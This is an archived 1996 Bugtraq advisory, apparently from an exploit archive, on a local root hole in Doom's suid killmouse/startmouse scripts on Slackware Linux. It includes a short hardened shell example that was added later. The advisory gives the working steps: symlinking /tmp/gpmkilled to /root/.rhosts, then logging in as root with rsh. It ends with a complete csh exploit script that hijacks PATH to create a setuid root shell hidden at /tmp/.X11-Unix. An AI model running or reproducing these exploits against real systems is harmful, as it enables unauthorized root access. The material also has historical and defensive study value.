Doom killmouse/startmouse vulnerability

Summary
Description: Doom calls insecure shell scripts as root, leading to easy root compromise.
Author: Bo (bo@ebony.iaehv.nl)
Compromise: root (local)
Vulnerable Systems: Linux, including Slackware 3.0. Possibly other distributions.
Date: 14 December 1996
Notes: If anyone runs suid root GAMES on a system they want secure, they DESERVE to be hacked! I've appended the obvious exploit to the end of this.
Details

From: Bo (bo@ebony.iaehv.nl)
Date: Sat, 14 Dec 1996 23:59:52 +0100 
To: Bugtraq

A word to the moderator:
Hi Aleph. It seems you were right in that if you look hard enough, the
root bugs will come your way. This time I have checked Underground
before I submitted this, and the linux bugs collection does not mention
this bug, so maybe I actually found a new one? It's hard to believe
since it's such a lamer, very much like the autoreply(1) bug. Let me
know if I am onto something here, okay?

System:
Probably Linux specific. Slackware 3.0 (which installs Linux 1.2.13) systems
that have the gpm utility and/or the Doom package installed are vulnerable.
Other distributions might be too.

Impact:
Local users can acquire root status.

Background:
The problem is the killmouse/startmouse command that is part of the Doom
package on Linux systems. It is actually a C wrapper that runs two
scripts (killmouse.sh/startmouse.sh). It runs suid root.

/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
  /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
  /bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi

/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
  GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi

Problem:
I would try to describe the problem but I can't stop laughing.

Exploit:
This can be exploited in a few similar ways. Here's just one. Let's
assume the gpm utility is not running. We can't start it up ourselves
as gpm is only to be run by root. So we'll use startmouse to fire it up:

$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse

ps -aux | grep gpm
bo        1436  0.0  2.0   40  312 v03 R    16:33   0:00 grep gpm
root      1407  0.0  2.4   42  368  ?  S    16:24   0:00 /usr/bin/gpm t ms

Fine, it's running. Now we'll use killmouse to kill the process, but
first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts:

$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
 1407  ?  S     0:00 gpm t ms

$ ls -l /root/.rhosts
-rw-rw-rw-   1 root     users           0 Dec 13 16:44 /root/.rhosts

$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#

Bingo. On some systems gpm might not be started in /etc/rc.d/rc.local,
so the startmouse script will fail. But gpm might be running already.
If neither of these conditions is met, note that startmouse.sh creates
/tmp/gpmscript and runs it in a shell. There's a window of time between
creating the script and executing it, so we have a nice race condition
here; it can be replaced with anything you like prior to execution.


Solution:
Remove setuid bits of killmouse/startmouse. Better yet - nuke them.
While you're at it, nuke Doom too - it's a stupid game anyway :-)

Best regards,
                Bo (bo@ebony.iaehv.nl)

--
                "Heisenberg may have been here".
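The checks that a safer startmouse/killmouse pair would need, as an added example that is not part of the original advisory or of the Doom package: the marker file lives in a root-owned, mode 0700 state directory instead of /tmp (the DOOM_STATE_DIR variable and its /var/run/doom default are assumptions), it is created with noclobber (O_EXCL) semantics, and the code refuses to create or consume a marker that is a symlink or sits in a directory it does not own, which is exactly the /tmp/gpmkilled -> /root/.rhosts link the write-up uses. It also never writes a script to be executed later, which is what opens the /tmp/gpmscript race described above; a suid wrapper should start gpm directly rather than feed a grep of rc.local to /bin/sh.

```shell
#!/bin/sh
# Hardened marker handling for a startmouse/killmouse-style suid helper.
# Added example; not the Doom package's scripts. DOOM_STATE_DIR and its
# default /var/run/doom are assumptions: the directory must be owned by
# the user the helper runs as (root in the real case) and be mode 0700.

umask 077
STATE_DIR="${DOOM_STATE_DIR:-/var/run/doom}"
MARKER="$STATE_DIR/gpmkilled"

# Succeeds only if $1 is a real directory (not a symlink) owned by the
# caller. find examines the start point itself (no -L), so a directory
# replaced by a link fails -type d, and a foreign owner fails -user.
state_dir_ok() {
    dir="$1"
    [ -d "$dir" ] || return 1
    [ -L "$dir" ] && return 1
    [ -n "$(find "$dir" -prune -type d -user "$(id -un)" -print 2>/dev/null)" ]
}

# Creates the marker with noclobber (O_EXCL) semantics and refuses any
# pre-existing path, so a planted link cannot redirect the write to
# /root/.rhosts. Returns non-zero instead of touching the link target.
create_marker() {
    marker="$1"
    state_dir_ok "$(dirname "$marker")" || return 1
    [ -L "$marker" ] && return 1
    [ -e "$marker" ] && return 1
    ( set -C; : > "$marker" ) 2>/dev/null || return 1
    [ -f "$marker" ] && [ ! -L "$marker" ]
}

# Consumes the marker only if it is a plain file in a directory we own;
# the "gpm was killed" decision is never taken from a link or from a
# world-writable location.
consume_marker() {
    marker="$1"
    [ -L "$marker" ] && return 1
    [ -f "$marker" ] || return 1
    state_dir_ok "$(dirname "$marker")" || return 1
    rm -f "$marker"
}
```

Run the functions as the user who owns the state directory. Because both paths fail closed, a killmouse built on create_marker leaves /root/.rhosts untouched when /tmp-style link games are attempted, and a startmouse built on consume_marker does nothing unless a genuine marker exists. The symlink and noclobber checks alone do not close the rc.local race, which is why this version has no equivalent of /tmp/gpmscript at all.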

And here is the obvious exploit, written by "Sorcery / mj13":

#!/bin/csh
# Doom exploit by Sorcery / mj13
# Use it only on your system!
# doomroot.sh (mode 755 =)             
#
# File to remove if it fails: ~/gpm,/tmp/gpmkilled,/tmp/gpmscript,/tmp/.X11-Unix
# Guy to great if it worx: beigebox@mygale.org (yeah, that's me ! :) )
#
# FIX: rm -rf /usr/games/doom =) 
#

cp /bin/bash /tmp/.X11-Unix
touch /tmp/gpmkilled
cat << EOF >> ~/gpm
/bin/chown root.root /tmp/.X11-Unix
/bin/chmod 4755 /tmp/.X11-Unix
/bin/rm ~/gpm
EOF
chmod 755 ~/gpm
set oldpath = ( $path )
set path = ~/
/usr/games/doom/startmouse >& /dev/null
echo "\n         This should happen now! =)"
echo "/tmp/.X11-Unix is perhaps your paradise, guy!"
echo "       Found and Exploited by Sorcery\n"
/usr/bin/sleep 2 # let's wait for gpm to finish his work...            
set path = ( $oldpath )
/tmp/.X11-Unix

# End of doom exploit


This page is part of Fyodor's exploit world.